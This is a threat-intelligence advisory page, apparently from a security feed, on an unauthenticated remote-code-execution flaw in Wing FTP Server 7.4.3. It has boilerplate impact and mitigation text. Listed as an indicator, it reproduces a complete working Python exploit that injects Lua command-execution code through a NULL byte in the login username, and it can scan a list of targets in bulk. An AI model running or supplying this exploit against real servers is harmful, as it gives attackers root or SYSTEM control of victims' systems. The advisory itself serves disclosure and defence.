Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
AI Analysis
Technical Summary
The security threat pertains to an unauthenticated remote code execution (RCE) vulnerability in Wing FTP Server version 7.4.3. This vulnerability allows an attacker to execute arbitrary code on the affected server without requiring any authentication, which significantly increases the risk and ease of exploitation. Wing FTP Server is a multi-protocol file transfer server supporting FTP, FTPS, SFTP, HTTP, and HTTPS, commonly used for managing file transfers in enterprise environments. The exploit targets a flaw in the server's handling of incoming requests, enabling remote attackers to inject and execute malicious payloads. The presence of exploit code written in Python indicates that proof-of-concept or weaponized scripts are available, facilitating exploitation by attackers with moderate technical skills. The vulnerability's critical severity classification underscores the potential for full system compromise, data theft, or disruption of services. Since no patch links are provided, it is likely that either a patch is not yet available or not publicly disclosed at the time of this report, increasing the urgency for mitigation. The lack of a CVSS score necessitates an independent severity assessment based on the nature of the vulnerability and its impact.
Potential Impact
For European organizations, the impact of this vulnerability can be severe. Organizations relying on Wing FTP Server for critical file transfer operations may face unauthorized access, data breaches, or complete system takeover. This can lead to exposure of sensitive personal data protected under GDPR, resulting in legal and financial penalties. Additionally, compromised servers can be used as pivot points for lateral movement within networks, escalating the scope of attacks. Disruption of file transfer services can affect business continuity, especially for sectors like finance, healthcare, and manufacturing that depend on reliable data exchange. The unauthenticated nature of the exploit lowers the barrier for attackers, increasing the likelihood of widespread exploitation. Furthermore, the availability of Python exploit code may accelerate attack campaigns targeting vulnerable servers across Europe.
Mitigation Recommendations
European organizations should immediately conduct an inventory to identify any instances of Wing FTP Server version 7.4.3 in their environment. Until an official patch is released, organizations should implement network-level mitigations such as restricting access to the FTP server to trusted IP addresses and deploying web application firewalls (WAFs) or intrusion prevention systems (IPS) with custom rules to detect and block exploit attempts. Monitoring network traffic for unusual activity related to FTP services is critical. Organizations should also consider temporarily disabling the Wing FTP Server or migrating to alternative secure file transfer solutions if feasible. Regular backups of critical data should be maintained to enable recovery in case of compromise. Once a patch becomes available, prompt application is essential. Additionally, organizations should educate their security teams about the exploit and monitor threat intelligence feeds for updates on active exploitation.
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland
Indicators of Compromise
- exploit-code: # Exploit Title: Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE) # CVE: CVE-2025-47812 # Date: 2025-06-30 # Exploit Author: Sheikh Mohammad Hasan aka 4m3rr0r (https://github.com/4m3rr0r) # Vendor Homepage: https://www.wftpserver.com/ # Version: Wing FTP Server <= 7.4.3 # Tested on: Linux (Root Privileges), Windows (SYSTEM Privileges) # Description: # Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE) # flaw (CVE-2025-47812). This vulnerability arises from improper handling of NULL bytes in the 'username' # parameter during login, leading to Lua code injection into session files. These maliciously crafted # session files are subsequently executed when authenticated functionalities (e.g., /dir.html) are accessed, # resulting in arbitrary command execution on the server with elevated privileges (root on Linux, SYSTEM on Windows). # The exploit leverages a discrepancy between the string processing in c_CheckUser() (which truncates at NULL) # and the session creation logic (which uses the full unsanitized username). # Proof-of-Concept (Python): # The provided Python script automates the exploitation process. # It injects a NULL byte followed by Lua code into the username during a POST request to loginok.html. # Upon successful authentication (even anonymous), a UID cookie is returned. # A subsequent GET request to dir.html using this UID cookie triggers the execution of the injected Lua code, # leading to RCE. import requests import re import argparse # ANSI color codes RED = "\033[91m" GREEN = "\033[92m" RESET = "\033[0m" def print_green(text): print(f"{GREEN}{text}{RESET}") def print_red(text): print(f"{RED}{text}{RESET}") def run_exploit(target_url, command, username="anonymous", verbose=False): login_url = f"{target_url}/loginok.html" login_headers = { "Host": target_url.split('//')[1].split('/')[0], "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded", "Origin": target_url, "Connection": "keep-alive", "Referer": f"{target_url}/login.html?lang=english", "Cookie": "client_lang=english", "Upgrade-Insecure-Requests": "1", "Priority": "u=0, i" } from urllib.parse import quote encoded_username = quote(username) payload = ( f"username={encoded_username}%00]]%0dlocal+h+%3d+io.popen(\"{command}\")%0dlocal+r+%3d+h%3aread(\"*a\")" "%0dh%3aclose()%0dprint(r)%0d--&password=" ) if verbose: print_green(f"[+] Sending POST request to {login_url} with command: '{command}' and username: '{username}'") try: login_response = requests.post(login_url, headers=login_headers, data=payload, timeout=10) login_response.raise_for_status() except requests.exceptions.RequestException as e: print_red(f"[-] Error sending POST request to {login_url}: {e}") return False set_cookie = login_response.headers.get("Set-Cookie", "") match = re.search(r'UID=([^;]+)', set_cookie) if not match: print_red("[-] UID not found in Set-Cookie. Exploit might have failed or response format changed.") return False uid = match.group(1) if verbose: print_green(f"[+] UID extracted: {uid}") dir_url = f"{target_url}/dir.html" dir_headers = { "Host": login_headers["Host"], "User-Agent": login_headers["User-Agent"], "Accept": login_headers["Accept"], "Accept-Language": login_headers["Accept-Language"], "Accept-Encoding": login_headers["Accept-Encoding"], "Connection": "keep-alive", "Cookie": f"UID={uid}", "Upgrade-Insecure-Requests": "1", "Priority": "u=0, i" } if verbose: print_green(f"[+] Sending GET request to {dir_url} with UID: {uid}") try: dir_response = requests.get(dir_url, headers=dir_headers, timeout=10) dir_response.raise_for_status() except requests.exceptions.RequestException as e: print_red(f"[-] Error sending GET request to {dir_url}: {e}") return False body = dir_response.text clean_output = re.split(r'<\?xml', body)[0].strip() if verbose: print_green("\n--- Command Output ---") print(clean_output) print_green("----------------------") else: if clean_output: print_green(f"[+] {target_url} is vulnerable!") else: print_red(f"[-] {target_url} is NOT vulnerable.") return bool(clean_output) def main(): parser = argparse.ArgumentParser(description="Exploit script for command injection via login.html.") parser.add_argument("-u", "--url", type=str, help="Target URL (e.g., http://192.168.134.130). Required if -f not specified.") parser.add_argument("-f", "--file", type=str, help="File containing list of target URLs (one per line).") parser.add_argument("-c", "--command", type=str, help="Custom command to execute. Default: whoami. If specified, verbose output is enabled automatically.") parser.add_argument("-v", "--verbose", action="store_true", help="Show full command output (verbose mode). Ignored if -c is used since verbose is auto-enabled.") parser.add_argument("-o", "--output", type=str, help="File to save vulnerable URLs.") parser.add_argument("-U", "--username", type=str, default="anonymous", help="Username to use in the exploit payload. Default: anonymous") args = parser.parse_args() if not args.url and not args.file: parser.error("Either -u/--url or -f/--file must be specified.") command_to_use = args.command if args.command else "whoami" verbose_mode = True if args.command else args.verbose vulnerable_sites = [] targets = [] if args.file: try: with open(args.file, 'r') as f: targets = [line.strip() for line in f if line.strip()] except Exception as e: print_red(f"[-] Could not read target file '{args.file}': {e}") return else: targets = [args.url] for target in targets: print(f"\n[*] Testing target: {target}") is_vulnerable = run_exploit(target, command_to_use, username=args.username, verbose=verbose_mode) if is_vulnerable: vulnerable_sites.append(target) if args.output and vulnerable_sites: try: with open(args.output, 'w') as out_file: for site in vulnerable_sites: out_file.write(site + "\n") print_green(f"\n[+] Vulnerable sites saved to: {args.output}") except Exception as e: print_red(f"[-] Could not write to output file '{args.output}': {e}") if __name__ == "__main__": main()
Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
Description
Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
AI-Powered Analysis
Technical Analysis
The security threat pertains to an unauthenticated remote code execution (RCE) vulnerability in Wing FTP Server version 7.4.3. This vulnerability allows an attacker to execute arbitrary code on the affected server without requiring any authentication, which significantly increases the risk and ease of exploitation. Wing FTP Server is a multi-protocol file transfer server supporting FTP, FTPS, SFTP, HTTP, and HTTPS, commonly used for managing file transfers in enterprise environments. The exploit targets a flaw in the server's handling of incoming requests, enabling remote attackers to inject and execute malicious payloads. The presence of exploit code written in Python indicates that proof-of-concept or weaponized scripts are available, facilitating exploitation by attackers with moderate technical skills. The vulnerability's critical severity classification underscores the potential for full system compromise, data theft, or disruption of services. Since no patch links are provided, it is likely that either a patch is not yet available or not publicly disclosed at the time of this report, increasing the urgency for mitigation. The lack of a CVSS score necessitates an independent severity assessment based on the nature of the vulnerability and its impact.
Potential Impact
For European organizations, the impact of this vulnerability can be severe. Organizations relying on Wing FTP Server for critical file transfer operations may face unauthorized access, data breaches, or complete system takeover. This can lead to exposure of sensitive personal data protected under GDPR, resulting in legal and financial penalties. Additionally, compromised servers can be used as pivot points for lateral movement within networks, escalating the scope of attacks. Disruption of file transfer services can affect business continuity, especially for sectors like finance, healthcare, and manufacturing that depend on reliable data exchange. The unauthenticated nature of the exploit lowers the barrier for attackers, increasing the likelihood of widespread exploitation. Furthermore, the availability of Python exploit code may accelerate attack campaigns targeting vulnerable servers across Europe.
Mitigation Recommendations
European organizations should immediately conduct an inventory to identify any instances of Wing FTP Server version 7.4.3 in their environment. Until an official patch is released, organizations should implement network-level mitigations such as restricting access to the FTP server to trusted IP addresses and deploying web application firewalls (WAFs) or intrusion prevention systems (IPS) with custom rules to detect and block exploit attempts. Monitoring network traffic for unusual activity related to FTP services is critical. Organizations should also consider temporarily disabling the Wing FTP Server or migrating to alternative secure file transfer solutions if feasible. Regular backups of critical data should be maintained to enable recovery in case of compromise. Once a patch becomes available, prompt application is essential. Additionally, organizations should educate their security teams about the exploit and monitor threat intelligence feeds for updates on active exploitation.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52347
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
# Exploit Title: Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE) # CVE: CVE-2025-47812 # Date: 2025-06-30 # Exploit Author: Sheikh Mohammad Hasan aka 4m3rr0r (https://github.com/4m3rr0r) # Vendor Homepage: https://www.wftpserver.com/ # Version: Wing FTP Server <= 7.4.3 # Tested on: Linux (Root Privileges), Windows (SYSTEM Privileges) # Description: # Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE) # flaw (CVE-2025-4781... (6683 more characters)
Threat ID: 68653a7e6f40f0eb7292de06
Added to database: 7/2/2025, 1:56:14 PM
Last enriched: 7/16/2025, 9:23:22 PM
Last updated: 7/30/2025, 9:11:45 AM
Views: 49
Related Threats
Critical Dahua Camera Flaws Enable Remote Hijack via ONVIF and File Upload Exploits
CriticalApple Patches Safari Vulnerability Also Exploited as Zero-Day in Google Chrome
CriticalHow we use MongoDB to detect and block malicious IPs in real time
LowCritical SAP flaw exploited to launch Auto-Color Malware attack on U.S. company
CriticalExploiting zero days in abandoned hardware
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.